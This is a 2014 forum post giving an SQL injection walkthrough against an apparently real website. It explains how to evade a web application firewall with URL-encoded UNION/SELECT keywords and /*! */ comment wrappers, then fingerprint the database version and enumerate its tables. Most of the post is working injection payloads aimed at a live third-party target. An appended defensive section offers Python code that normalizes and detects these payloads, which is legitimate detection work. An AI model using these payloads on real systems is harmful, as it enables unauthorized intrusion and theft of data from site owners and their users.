Sn1p3r Posted August 18, 2014

Simple WAF Bypass

Today I give you an idea: "WAF bypass with error 403/404/406 and also URL encode".

http://wonderlandthe...rpark.php?wid=5

This is our target and it is vulnerable.

Find the number of columns:-

Let's try to find the number of columns.

http://wonderlandthe...rpark.php?wid=5 order by 1--

Not working and gives an error, which means order by does not work. Sometimes, in some cases, order by does not work, so then try to use group by. Just replace order with group, like:

http://wonderlandthe...rpark.php?wid=5 group by 1--

Works :-) Like this we increase the number until we get an error.

http://wonderlandthe...rpark.php?wid=5 group by 4--

We get an error, which means it has 3 columns.

Now check the "union function":

http://wonderlandthe...park.php?wid=-5 union select 123--

Not working :/ Gives an error with 404 and 406.

Now I'll tell you a little bit about the 404 and 406 errors.

Error 404: when we get a 404 error we need to use a filter and other things. But on this site the filter/special comment works, the special comment /*! and */. Using it we can bypass the 404 error.

Error 406: when we get a 406 error we need to bypass it with URL encoding of union.

Now come to the point.

We use the special comment/filter with URL encoding to bypass our site, like:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 123--

Bypassed.

But let me tell you about the 403 error: when we get a 403 error we need to use overlapping on the union and select, like:-

/*!00000union*/ /*!00000select*/

Now come to our target: when we use the union function we do not see any vulnerable column number on the page, but we see one thing like a cracked picture, so it means the vulnerable column number is hidden in the HTML code. Before opening the code we will do something different in the query to see the vulnerable number easily, like:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111111--

Now open the code, press ctrl+f and put 1: no result. Then put 11: no result. Then put 111 and we will get the vulnerable number.

Now find the "Version":

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version()--

Not working, error on the (). Now use URL encoding:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version%28%29--

Bypassed. Now open the HTML code, press ctrl+f and put 5.1 and you will see the version, like 5.1.73-cll.

Now I will try to print the version on the page using concat():

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28version%28%29%29--

Works, but again only in the HTML code. Now I use an HTML tag: before it use '">' and after the version use ', and you can also use the HTML tag in hex. Let's try to print the version on the page:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28'">'version%28%29'

Worked.

EXTRACTING DATABASE TABLES:-

I will do it using URL encoding and the filter, like:

http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111group_concat%28/*!'">'table_name*/'

Worked :-) Done.
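As an added example from the defender's side, not part of Sn1p3r's post: a small Python normalizer that shows why the percent-encoded keywords and /*!...*/ wrappers in the post slip past a filter that matches raw request bytes, and what the same check sees once the request is canonicalized the way MySQL will read it. The request paths (/page.php?wid=) and the sample list are constructed for this example and are not the site in the post; the signature names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines shaped like the payloads in the post.
# The path /page.php?wid= is a placeholder, not the site from the post.
SAMPLE_REQUESTS = [
    "/page.php?wid=5",                                                  # benign
    "/page.php?wid=5 order by 1--",                                     # column-count probe
    "/page.php?wid=5 group by 4--",                                     # same probe, GROUP BY variant
    "/page.php?wid=-5 union select 123--",                              # plain UNION, what a naive filter catches
    "/page.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 123--",                 # keywords hidden by encoding + /*!..*/
    "/page.php?wid=-5 /*!00000union*/ /*!00000select*/ 1,2,3--",         # /*!00000 ... */ variant
    "/page.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version%28%29--",    # version() with encoded parentheses
    "/page.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111group_concat%28/*!'\">'table_name*/'",
]

# MySQL executes the body of a /*!NNNNN body */ ("versioned") comment as ordinary SQL,
# so a matcher has to look at the body, not the wrapper.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)
# Ordinary /* ... */ comments are discarded by the server.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def naive_matches(raw: str) -> bool:
    """The kind of check the post is evading: a regex run over the raw request bytes."""
    return re.search(r"union\s+select", raw, re.I) is not None


def normalize(raw: str, max_rounds: int = 3) -> str:
    """Canonicalize a request the way the database will eventually read it."""
    s = raw
    # Percent-decode until the string stops changing, so double encoding cannot hide a keyword.
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = VERSIONED_COMMENT.sub(r" \1 ", s)   # keep the executed body, drop the /*! ... */ wrapper
    s = PLAIN_COMMENT.sub(" ", s)           # drop inert comments entirely
    return re.sub(r"\s+", " ", s).strip().lower()


# Signatures are applied to the normalized text only.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*?\bselect\b", re.S),
    "column_count_probe": re.compile(r"\b(order|group)\s+by\s+\d+"),
    "version_fingerprint": re.compile(r"version\s*\(\s*\)"),  # no leading \b: the post glues it to a number
    "schema_enumeration": re.compile(r"\b(table_name|column_name|information_schema)\b"),
    "comment_terminator": re.compile(r"--\s*$"),
}


def classify(raw: str) -> list:
    """Return the names of every signature that fires on the canonicalized request."""
    norm = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]


def scan(requests) -> dict:
    """Map each request to (naive verdict, canonicalized verdict) for side-by-side comparison."""
    return {r: (naive_matches(r), classify(r)) for r in requests}


if __name__ == "__main__":
    for req, (naive, hits) in scan(SAMPLE_REQUESTS).items():
        print(f"naive={str(naive):<5}  canonical={hits or '-'}  {req}")
```

Running it prints one line per sample: the encoded and comment-wrapped requests get naive=False but a full canonical hit list, while the plain union select is caught by both. The point is that a filter inspecting raw bytes can be stepped around with one more encoding layer, so inspection has to happen after decoding and comment handling, and the durable fix for a parameter like wid= is a parameterized statement rather than a longer blocklist.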